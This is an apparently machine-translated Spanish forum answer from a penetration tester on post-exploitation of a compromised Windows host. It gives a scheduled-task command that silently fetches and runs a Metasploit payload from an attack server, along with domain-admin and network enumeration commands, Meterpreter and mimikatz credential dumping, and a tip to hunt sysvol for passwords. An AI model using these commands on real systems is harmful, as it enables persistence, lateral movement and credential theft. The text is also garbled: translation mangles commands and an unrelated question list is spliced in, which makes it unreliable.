Gran pregunta! Una vez que haya obtenido acceso de shell a un sistema (Windows), volveré a la fase de reconocimiento e investigaré el entorno interno. Las cosas principales que buscaré son:
- Un método para mantener el acceso (persistencia).
- Nombres / nombres de usuario de administradores y administradores de dominio.
- Nombres de sistemas cercanos para futuros ataques.
- Credenciales adicionales
Mantenimiento del acceso : una forma fácil de mantener el acceso es registrando una tarea programada que inicia una conexión de meterpreter a mi servidor de ataque cada 30 minutos:
schtasks.exe / Crear / F / SC minuto / mes 30 / TN "MyPenetrationTest" / RU "SYSTEM" / TR "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient) .downloadstring (' '' http://10.10.0.10/wdflkjw '' ')) "
El comando anterior inicia una carga útil de Metasploit web_delivery y me dará acceso si falla mi acceso inicial.
- ¿Qué es EternalRock y Wannacry?
- Hackers: ¿Fue Facebook responsable de la violación de seguridad de Twitter?
- ¿Por qué la contraseña en muchos sitios web requiere ser complicada?
- Como resultado del error Heartbleed, ¿necesito cambiar cada una de mis contraseñas únicas?
- ¿Cuál es el mejor antivirus para mi laptop?
2. Usuarios administradores : para descubrir quiénes son los administradores de dominio, puede usar el siguiente comando:
grupo de red "Administradores de dominio" / Dominio
Lo mismo se aplica a otros grupos de interés. Para buscar otros grupos, ejecute:
grupo neto
3. Sistemas cercanos : una forma rápida de encontrar sistemas cercanos en un entorno de Microsoft es mediante el siguiente comando:
vista neta
Puede ser útil ver qué sistemas se están conectando al sistema comprometido. Una forma de ver esa información es ejecutando:
netstat -an
Tener una lista de sistemas cercanos puede reducir el tiempo requerido para encontrar el siguiente sistema al que desea apuntar. Esto es especialmente cierto si la convención de nomenclatura de la organización de destino incluye la función del sistema en el nombre de host.
4. Contraseñas adicionales : si bien estos no son comandos cmd.exe, casi siempre uso la línea de comandos de Meterpreter para extraer contraseñas de la memoria. Aquí están los comandos que uso:
getsystem # Intentos para elevar a los privilegios del sistema hashdump #Vuelca hash de contraseña para cuentas locales cargar mimikatz # Carga mimikatz en meterpreter livessp #Vuelca las contraseñas de livessp msv #Vuelca las contraseñas de msv kerberos #Vuelca las contraseñas de kerberos wdigest #dumps wdigest contraseñas
Además, puede buscar / sysvol compartir en el controlador de dominio para las secuencias de comandos de directiva de grupo. Los scripts ubicados allí pueden contener contraseñas adicionales u otras gemas ocultas. 🙂
¡Póngase en contacto si tiene alguna pregunta! 🙂